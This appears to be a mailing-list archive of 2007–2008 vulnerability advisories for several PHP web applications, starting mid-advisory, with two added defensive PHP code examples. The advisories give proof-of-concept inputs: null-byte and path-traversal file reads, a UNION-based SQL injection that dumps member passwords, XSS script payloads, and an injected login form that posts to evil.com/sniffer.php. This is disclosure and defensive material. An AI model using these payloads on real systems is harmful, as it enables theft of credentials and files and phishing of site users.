    $errorpath = dirname($DEFAULTS->ERROR_PAGE_404);
...
...

// the file is read in binary mode and echoed as-is
$fsize = filesize($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name);
$fd = fopen($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name, "rb");
$contents = fread($fd, $fsize);
$contents = trim($contents);
$fsize = strlen($contents);
fclose($fd);
...

echo $contents;

---


Example: 



http://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif

default.php contains the admin password and other defaults:

---

class defaults {
    function defaults() {
        global $PHP, $PHPCMS;
        if(!defined("_DEFAULTS_")) {
            define("_DEFAULTS_", TRUE);
        }

        $this->PASS = 'YourPasswordHere';
...

---


On Windows we can read any local file:

http://[server]/[installdir]/parser/parser.php?file=\..\..\..\..\..\..\..\..\..\..\boot.ini%00.gif




http://www.phpcms.de/download/index.en.html






About
*




Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)





Nucleus 3.31 XSS in path

2008-01-29 Thread Digital Security Research Group
Hello.


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-006


Application:            Nucleus CMS
Versions Affected:      3.31
Vendor URL:             http://nucleuscms.org
Bugs:                   XSS Injection in URL
Exploits:               YES
Reported:               16.01.2008
Vendor response:        18.01.2008
Date of Public Advisory: 29.01.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG] 
                        (research [at] dsec [dot] ru)



Description
***

A linked XSS vulnerability was found in action.php; an attacker can inject XSS into the
URL string:

Example:

http://[server]/[installdir]/action.php/;<script>alert('DSecRG XSS')</script>


Fix Information
***

TikiWiki was altered to fix this flaw on 29 January 2008. The updated version 
(3.32) can be downloaded here:

http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download










[!!FIX Information ] Nucleus 3.31 XSS in path

2008-01-29 Thread Digital Security Research Group
This is an updated version of the advisory: updated info in the Fix
Information part, and a mistake in the vendor name.




Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-006


Application:            Nucleus CMS
Versions Affected:      3.31
Vendor URL:             http://nucleuscms.org
Bugs:                   XSS Injection in URL
Exploits:               YES
Reported:               16.01.2008
Vendor response:        18.01.2008
Date of Public Advisory: 29.01.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG] 
                        (research [at] dsec [dot] ru)



Description
***

A linked XSS vulnerability was found in action.php; an attacker can inject XSS into the
URL string:

Example:

http://[server]/[installdir]/action.php/;<script>alert('DSecRG XSS')</script>


Fix Information
***

Nucleus was altered to fix this flaw on 29 January 2008. The updated version (3.32) 
can be downloaded here:

http://prdownloads.sourceforge.net/nucleuscms/nucleus3.32.zip?download










[DSECRG-08-003] blogcms 4.2.1b Multiple Security Vulnerabilities

2008-01-16 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-003


Application:            Blogcms
Versions Affected:      Blogcms 4.2.1b
Vendor URL:             http://blogcms.com/
Bugs:                   SQL Injections, SiXSS, XSS
Exploits:               YES
Reported:               15.01.2008
Vendor response:        16.01.2008
Date of Public Advisory: 16.01.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG] 
                        (research [at] dsec [dot] ru)



Description
***

The Blogcms system has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Linked XSS
3. Multiple Linked SiXSS



Details
***

1. Multiple SQL Injection vulnerabilities


1.1 An attacker can inject SQL code in index.php, parameter name blogid


Example:

http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*



1.2 An attacker can inject SQL code in module /blogcms/action.php, POST parameter 
name user


Example:

POST /blogcms/action.php HTTP/1.0
Cookie: DokuWiki=g8m41hncjkfjkc4sb1lvmgbiu5
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727)
Host: 192.168.40.33
Pragma: no-cache
Connection: Keep-Alive

action=addcomment&url=http%3A%2F%2F192.168.40.33%2Fblogcms%2F%3Fitem%3Dblog-cms-4-2-1&itemid=1&body=asd&userid=asd&x=42&y=13&user=asd'+[DSecRG_INJECTION]

---


2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerabilities were found in /photo/admin.php and /photo/index.php; an
attacker can inject XSS script into the URL

Example:

http://[server]/[installdir]/photo/admin.php/;<script>alert('DSECRG_XSS')</script>

http://[server]/[installdir]/photo/index.php/;<script>alert('DSECRG_XSS')</script>



---
3. Multiple SiXSS (XSS through SQL Injection Error) vulnerabilities


3.1 A linked SiXSS vulnerability was found in index.php; an attacker can inject XSS code 
into the SQL error 

Example:

http://[server]/[installdir]/index.php?query=asd&amount=0&blogid=1'<script>alert('DSecRG_XSS')</script>;x=34&y=6



3.2 A linked SiXSS vulnerability was found in /admin/plugins/table/index.php; 
an attacker can inject XSS code into the SQL error 

It is also a SQL injection, but because it is in the admin panel it is not critical.

Example:

http://[server]/[installdir]/admin/plugins/table/index.php?action=edittemplate&field=title'<script>a=/DSecRG XSS/%0d%0aalert(a.source)</script>&id=2&text=0

---



Fix Information
***

Blogcms was altered to fix this flaw on 16.01.2008. The updated version (4.2.1.c) 
can be downloaded here:

http://blogcms.com/?item=download

Changelog:  http://blogcms.com/wiki/changelog








[DSECRG-08-002] Local File Include in arias 0.99-6

2008-01-16 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-002


Application:aria-0.99-6 (Web based ERP)
Versions Affected:  aria-0.99-6
Vendor URL: http://www.tucows.net/
Bug:Local File Include
Exploits:   YES
Reported:   09.01.2008
Vendor Response:None
Date of Public Advisory:15.01.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Aria has a Local File Include vulnerability in page arias/help/effect.php 


Code




// vulnerable as shipped: $page comes straight from the query string and is
// only checked with is_file(), which accepts any readable path on the host
if (empty($_GET['page'])) {
    $page = 'help.php';
} else {
    $page = $_GET['page'];
}
if (false == is_file($page)) {
    $page = 'file_not_found.php';
}
include($page);




Example: 

http://[server]/[installdir]/arias/help/effect.php?page=[file]






LFI in Tuned Studios Templates

2008-01-09 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-001


Application:            Tuned Studios Templates
Versions Affected:      All
Vendor URL:             http://www.tunedstudios.com
Bug:                    Local File Include
Exploit:                YES
Reported:               09.01.2008
Date of Public Advisory: 09.01.2008
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG] 
                        (research [at] dsec [dot] ru)



Description
***

Tuned Studios Templates has a Local File Include vulnerability in page 
phpversion/index.php 


Details
***

Tuned Studios has many templates based on the same vulnerable PHP code

Code



//First check if $page exists
//With the introduction of PHP 5 we have to capture the $page from the url.
$page = $_GET['page'];

if(isset($page) && $page != '')
{
    //Check if the page $page exists
    //(vulnerable as shipped: no traversal check, and a trailing %00 in $page
    // cuts off the appended '.php' on the PHP versions of the time)
    if(file_exists($page.'.php'))
    {
        //Now we can include the page.
        include($page.'.php');
    }
    else
    {
        //Page can't be found, include the error file
        include('data/error404.data.php');
    }
}


Example: 

http://[server]/[installdir]/index.php?page=../../../../../../../[file]%00

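The three file-include flaws above (phpcms GetFile(), Aria effect.php and the Tuned Studios template) share one root cause: the user-supplied name is never canonicalised or checked for a null byte before it reaches fopen()/include(). The following is an added example, not code from any of those projects; the document root, the extension list and the function name are assumptions.

```php
<?php
// Added example (not phpcms, Aria or Tuned Studios code): the checks the
// three vulnerable snippets lack. Directory and extension list are assumptions.

/**
 * Resolve a user-supplied page name to a file inside $baseDir.
 * Returns the canonical path, or null if the name must be refused.
 */
function resolve_page(string $userPath, string $baseDir, array $allowedExt): ?string
{
    // Null byte: "default.php%00.gif" satisfies a substring test for ".gif",
    // but PHP before 5.3.4 truncated the name at the NUL before opening it.
    if (strpos($userPath, "\0") !== false) {
        return null;
    }
    // Test the real extension, not "does '.gif' occur anywhere in the string".
    $ext = strtolower(pathinfo($userPath, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    // Canonicalise: realpath() collapses "../" (and "..\" on Windows) and
    // returns false when the file does not exist.
    $root = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\'));
    if ($root === false || $full === false) {
        return null;
    }
    // Confine to the document root: the canonical path must start with it.
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed demo: a throw-away document root holding one public page.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/about.html', "<p>hello</p>\n");
$allowed = ['html', 'gif', 'png', 'jpg', 'css', 'js'];

$cases = [
    'pages/about.html',                   // legitimate page: resolves
    "parser/include/default.php\0.gif",   // null-byte extension trick: refused
    '../../../../../../etc/passwd',       // traversal, wrong extension: refused
    '/pages/../../../pages/about.html',   // traversal that leaves the root: refused
];
foreach ($cases as $c) {
    $r = resolve_page($c, $root, $allowed);
    printf("%-40s => %s\n", addcslashes($c, "\0"), $r === null ? 'REFUSED' : $r);
}
unlink($root . '/pages/about.html'); rmdir($root . '/pages'); rmdir($root);
```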




2z-project 0.9.6.1 Multiple Security Vulnerabilities

2007-12-28 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory

Name:                   2z project
Systems Affected:       2z project 0.9.6.1
Vendor URL:             http://2z-project.ru
Authors:                Alexandr Polyakov, Stas Svistunovich
                        Digital Security Research Group [DSecRG] (research 
                        [at] dsec [dot] ru)
Reported:               27.12.2007
Vendor response:        27.12.2007
Date of Public Advisory: 28.12.2007

Description
***

The 2z system has multiple security vulnerabilities:

1.  Stored XSS
2.  Linked XSS
3.  Image XSS
4.  Path disclosure
5.  Vulnerable Password changing algorithm


Details
***


1. Multiple Stored XSS


1.1 Vulnerability in script http://[server]/[installdir]/?action=addnews in 
POST parameters:

parameter name = contentshort
parameter name = contentfull

Example:

contentshort=<script>alert('DSecRG XSS')</script>
contentfull=<script>alert('DSecRG XSS')</script>


1.2 Vulnerability in script 
http://[server]/[installdir]/2z/admin.php?mod=pm&action=write

parameter name = content

Example:

content=<script>alert('DSecRG XSS')</script>

---

2. Linked XSS vulnerability in page index.php.
It works only if the user is not logged in, so it can be used for phishing (see 
Example).

Template /templates/default/usermenu.tpl has a vulnerable parameter 
referer. 
This template is included in index.php, so it can be used for phishing.

Source code of usermenu.tpl:
---
<form name="login" method="post" action="" id="login">
<input type="hidden" name="referer" value="{request_uri}" />   <-- html code 
injected into {request_uri} 
<input type="hidden" name="action" value="dologin" />
..
<input onfocus="if (!set_login){set_login=1;this.value='';}" value="{l_name}" 
class="mw_login_form" type="text" name="username" maxlength="60" size="25" />
..
<input onfocus="if(!set_pass){set_pass=1;this.value='';}" value="{l_password}" 
class="mw_login_form" type="password" name="password" maxlength="20" size="25" 
/>
..
</form>
---

Example:

http://[server]/[installdir]/?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value=
http://[server]/[installdir]/index.php?/form/name=login/method=post/action=http://evil.com/sniffer.php/id=login;input/type=hidden/name=referer/value=

-

3. Image XSS vulnerability in page /2z/?action=profile  

An attacker can upload an avatar and a photo containing XSS code.

Vulnerable parameters: newavatar, newphoto

For more information see http://www.dsec.ru/about/articles/web_xss/ (in Russian)

-

4. Path disclosure

By exploiting this issue, an attacker may gain sensitive information on the 
directory structure of the server machine, which allows for further attacks 
against the site. 

Example:

http://[server]/[installdir]/index.php?template=test
http://[server]/[installdir]/?year=1234&month=06 

-

5. Password changing vulnerability

The old password is not needed to change the password.

-


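The usermenu.tpl flaw (item 2 above) and the path-based XSS in Nucleus action.php and blogcms /photo/*.php all come from echoing the request URI into a page without escaping, which is what lets an injected form redirect the login POST elsewhere. Below is an added example, not 2z, Nucleus or blogcms code, of emitting the hidden referer field safely; the function names and the allowed-character rule are assumptions.

```php
<?php
// Added example (not 2z, Nucleus or blogcms code): build the "return to"
// hidden field from the request URI without reflecting attacker markup.

/**
 * Reduce the request URI to a same-site path we are willing to send the
 * user back to after login; anything suspicious collapses to '/'.
 */
function safe_return_path(string $requestUri): string
{
    $parts = parse_url($requestUri);
    // A scheme or host means an off-site address: never a return target.
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return '/';
    }
    $path  = $parts['path'] ?? '/';
    $query = $parts['query'] ?? '';
    // Plain path and query characters only: this rejects the quote,
    // angle-bracket and "<form ...>" mixes from the advisory examples.
    if (!preg_match('#\A/[A-Za-z0-9_./-]*\z#', $path) || strpos($path, '..') !== false) {
        return '/';
    }
    if ($query !== '' && !preg_match('#\A[A-Za-z0-9_.=&%-]*\z#', $query)) {
        return '/';
    }
    return $path . ($query !== '' ? '?' . $query : '');
}

/** Emit the hidden field; the value is HTML-escaped, quotes included, even
 *  after validation, so a future relaxation of the rule cannot reopen XSS. */
function referer_field(string $requestUri): string
{
    $value = htmlspecialchars(safe_return_path($requestUri), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="referer" value="' . $value . '" />';
}

// Constructed inputs modelled on the advisory's examples.
$inputs = [
    '/2z/index.php?action=profile',                                   // kept as-is
    '/2z/?"><form name=login action=http://evil.example/sniffer.php>', // query dropped
    '/action.php/"><script>alert(1)</script>',                        // path dropped
    'http://evil.example/phish',                                      // off-site dropped
];
foreach ($inputs as $uri) {
    echo referer_field($uri), "\n";
}
```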